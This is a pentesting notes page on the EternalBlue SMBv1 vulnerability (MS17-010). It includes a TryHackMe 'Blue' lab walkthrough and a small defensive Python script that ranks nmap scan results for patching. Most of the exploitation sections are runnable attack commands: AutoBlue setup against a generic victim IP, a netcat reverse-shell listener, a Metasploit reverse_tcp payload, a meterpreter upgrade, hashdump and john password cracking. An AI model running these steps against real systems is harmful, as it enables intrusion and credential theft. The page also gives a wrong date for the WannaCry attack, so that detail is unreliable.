CVE-2017-0144: EternalBlue: MS17-010
EternalBlue (MS17-010/CVE-2017-0144) is a critical vulnerability in the Windows Server Message Block (SMBv1) protocol that allows attackers to remotely execute arbitrary code and gain access to a Windows system, potentially compromising the entire network. The exploit, developed by the NSA, was leaked by a hacker group called the Shadow Brokers in 2017.
Why the Vulnerability Occurs
The vulnerability stems from improper handling of specially crafted SMBv1 packets: an unauthenticated attacker who can reach TCP port 445 can send malicious packets to a vulnerable machine and execute arbitrary code on it.
At the root is a buffer overflow in the Windows SMBv1 implementation caused by improper validation of transaction requests. The length of input data fields and the associated error conditions are handled incorrectly, which lets an attacker corrupt kernel memory and gain remote code execution with high-level privileges. Because no authentication is required and SMB is usually reachable across internal networks, the flaw is a critical issue that can be exploited to propagate malware such as WannaCry from host to host.
Key Features of EternalBlue
Exploits the SMBv1 vulnerability (MS17-010) in unpatched Windows systems.
Affected versions include Windows Vista, 7, Server 2008, 8.1, Server 2012, 10, and Server 2016.
Was infamously used in the WannaCry ransomware attack on June 27, 2017, which spread rapidly across networks.
Microsoft released a patch for the vulnerability in March 2017, but many systems remain unpatched, leaving them vulnerable to attacks.
Exploitation
MSF
EternalBlue allows attackers to send crafted SMBv1 packets to a vulnerable system and gain privileged access. Metasploit ships an auxiliary scanner module (auxiliary/scanner/smb/smb_ms17_010) that checks whether a host is vulnerable and an exploit module (exploit/windows/smb/ms17_010_eternalblue) that runs the attack and returns a privileged session on unpatched systems. The exploit can also be run manually using publicly available code such as AutoBlue.
AutoBlue
# nmap for vulnerability assessment
nmap -sV [IP]
nmap -sV -p 445 --script smb-vuln-ms17-010 [IP]
# using autoblue
git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
cd AutoBlue-MS17-010
pip install -r requirements.txt
cd shellcode
chmod +x shell_prep.sh
./shell_prep.sh
nc -lvnp 1234
chmod +x eternalblue_exploit_winx.py
python eternalblue_exploit_winx.py [Victim IP] shellcode/sc_x64.bin
# command shell on the listening port
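The smb-vuln-ms17-010 scan above prints a per-host verdict as text; when the same scan is saved with -oX, the XML can be parsed to build a patch-priority list for the hosts that still expose SMBv1. The following Python is an added example, not part of this page or of AutoBlue: the nmap XML sample is constructed (192.0.2.x are documentation addresses, not real hosts) and the verdict labels are my own.

```python
import xml.etree.ElementTree as ET
# Constructed sample of "nmap -oX" output (not a real scan): .10 is
# reported VULNERABLE by smb-vuln-ms17-010, .11 gave the script no
# usable answer, .12 has tcp/445 closed.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
 <host><status state="up"/><address addr="192.0.2.10" addrtype="ipv4"/><ports>
  <port protocol="tcp" portid="445"><state state="open"/>
   <script id="smb-vuln-ms17-010" output="VULNERABLE: Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)">
    <table key="CVE-2017-0144"><elem key="state">VULNERABLE</elem></table>
   </script></port></ports></host>
 <host><status state="up"/><address addr="192.0.2.11" addrtype="ipv4"/><ports>
  <port protocol="tcp" portid="445"><state state="open"/>
   <script id="smb-vuln-ms17-010" output="Could not negotiate a connection"/></port></ports></host>
 <host><status state="up"/><address addr="192.0.2.12" addrtype="ipv4"/><ports>
  <port protocol="tcp" portid="445"><state state="closed"/></port></ports></host>
</nmaprun>"""

def script_verdict(script):
    """Map one smb-vuln-ms17-010 <script> element to a verdict label."""
    if script is None:
        return "NOT_CHECKED"  # the NSE script was not run against this port
    for elem in script.iter("elem"):  # structured state from the vulns library
        if elem.get("key") == "state":
            text = (elem.text or "").strip().upper()
            if text.startswith("NOT"):
                return "NOT_VULNERABLE"
            return "VULNERABLE" if "VULNERABLE" in text else "UNKNOWN"
    return "UNKNOWN"  # no state at all, e.g. SMB negotiation failed

def triage_ms17_010(xml_text):
    """Return {ip: verdict} for every live host with tcp/445 open."""
    results = {}
    for host in ET.fromstring(xml_text).iter("host"):
        status = host.find("status")
        addr = host.find("address[@addrtype='ipv4']")
        if status is None or status.get("state") != "up" or addr is None:
            continue
        for port in host.iter("port"):
            state = port.find("state")
            if (port.get("protocol"), port.get("portid")) == ("tcp", "445") \
                    and state is not None and state.get("state") == "open":
                results[addr.get("addr")] = script_verdict(
                    port.find("script[@id='smb-vuln-ms17-010']"))
    return results

def patch_queue(results):
    """IPs in patching order: confirmed vulnerable first, unresolved checks next."""
    rank = {"VULNERABLE": 0, "UNKNOWN": 1, "NOT_CHECKED": 1, "NOT_VULNERABLE": 2}
    return sorted(results, key=lambda ip: (rank[results[ip]], ip))
```

Hosts whose check came back UNKNOWN still need a follow-up (patch MS17-010 or disable SMBv1), since a failed negotiation says nothing about the patch level.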
TryHackMe:Blue Exploitation
# scan the machine
sudo nmap -Pn -sV -O -sS 10.10.17.20 -oX nmap-blue.xml
w/ MSF
db_import nmap-blue.xml
setg RHOSTS 10.10.17.20
# search and use scanning module
search type:auxiliary name:ms17
use auxiliary/scanner/smb/smb_ms17_010
run
# search for the exploit module and use it
search type:exploit name:ms17
use exploit/windows/smb/ms17_010_eternalblue
# set a plain reverse shell payload explicitly, then run
set payload windows/x64/shell/reverse_tcp
exploit
# escalate shell to meterpreter session
search shell_to_meterpreter
use post/multi/manage/shell_to_meterpreter
set SESSION 1
run
# use the meterpreter session
sessions
sessions -i 2
# cracking
hashdump
# using john
john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt crack.txt
# flag
meterpreter> search -f flag*.txt
w/ AutoBlue
# in the autoblue directory
cd shellcode
chmod +x shell_prep.sh
./shell_prep.sh
# reverse shell
nc -lvnp 4567
python eternalblue_exploit_winx.py 10.10.17.20 shellcode/sc_x64.bin
other Semi MSF